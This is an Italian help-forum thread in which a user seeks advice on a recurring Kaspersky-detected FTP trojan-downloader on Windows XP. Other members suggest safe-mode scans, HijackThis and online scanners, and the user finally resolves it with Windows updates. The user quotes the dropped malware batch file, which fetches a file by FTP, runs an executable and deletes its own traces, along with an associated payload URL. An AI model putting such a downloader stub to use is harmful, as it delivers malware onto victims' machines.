Da qualche giorno ho la segnalazione da parte di Kaspersky di un trojan .pif che lui elimina ma poi dopo qualche ora ricompare.
Nella cartella C:\windows\system32 compare un file c.bat che contiene queste righe:

@echo off
ftp -n -v -s:.pif
boxide.exe
del .pif
del /F c.bat
exit /y

http://sandokan.altervista.org/vir.gif

Come lo tolgo in maniera definitiva?

Prova a toglierlo ripetendo la scansione dalla modalita' provvisoria e col ripristino di sistema disabilitato. Eventualmente prova anche ad usare hijackthis per rimuoverlo.

Non ho il ripristino abilitato di default, ho provato con Spysweeper,Ad-Aware,XoftSpy,Adware Away ma non mi rilevano alcun trojan.
E' come se provenisse da internet, ed una volta bloccato da KAV non esiste + sul disco finchè non se lo và a riprendere da Internet e ricomincia la storia

Non ho il ripristino abilitato di default, ho provato con Spysweeper,Ad-Aware,XoftSpy,Adware Away ma non mi rilevano alcun trojan.
E' come se provenisse da internet, ed una volta bloccato da KAV non esiste + sul disco finchè non se lo và a riprendere da Internet e ricomincia la storia
Se tu dici che non si trova sul disco allora e' possibile che sia qualche malware che infesta qualche sito che tu frequenti. Evita di andare su siti che non sono sicuri, metti un buon firewall, aggiorna il sistema operativo ed usa firefox come browser alternativo per navigare.

Ho notato che la cosa succede anche appena caricato WinXP SP1a, quindi senza aver aperto alcuna pagina internet.
Mi becco questo avviso dal KAV C:\WINDOWS\system32\.pif Trojan-Downloader.BAT.Ftp.z
Che si fà? Come elimino il virus-worm-trojan ? C'è qualche patch microsoft da mettere?

Prova a fare una scansione qui ;)

http://it.trendmicro-europe.com/consumer/products/housecall_launch.php

Fai anche una scansione con HijackThis e metti il log qui

Ho fatto il log, cmq ritengo sia una debolezza di Windows XP altrimenti non mi verrebbe fuori all'inzio, ma dopo aver navigato su qualche pagina infetta :)

Fixa:

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\WINDOWS\SYSTEM\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *new-search.net*;*x-google.net*
O3 - Toolbar: (no name) - {ACB1E670-3217-45C4-A021-6B829A8A27CB} - (no file)

Poi ci sarebbero queste 2 voci di file missing:
O23 - Service: AVP Control Centre Service (AVPCC) - Unknown owner - C:\Programmi\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\avpcc.exe" /service (file missing)
O23 - Service: KAV Monitor Service (KAVMonitorService) - Unknown owner - C:\Programmi\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro\avpm.exe" /service (file missing)

vi farò sapere... ;) grazie

io ti consiglierei anche di installare il service pack 2

io ti consiglierei anche di installare il service pack 2
No, l' SP2 non mi và d'installarla (ho letto che è instabile), aspetto la SP3.
Comunque dopo aver provato tutti gli antivirus,antitrojan,antiworm possibili ed immaginabili, ho fatto con Microsoft Update un check del sistema Windows XP SP1 ed installato 23 aggiornamenti proritari.
Al momento :sperem: sembra aver funzionato... :winner: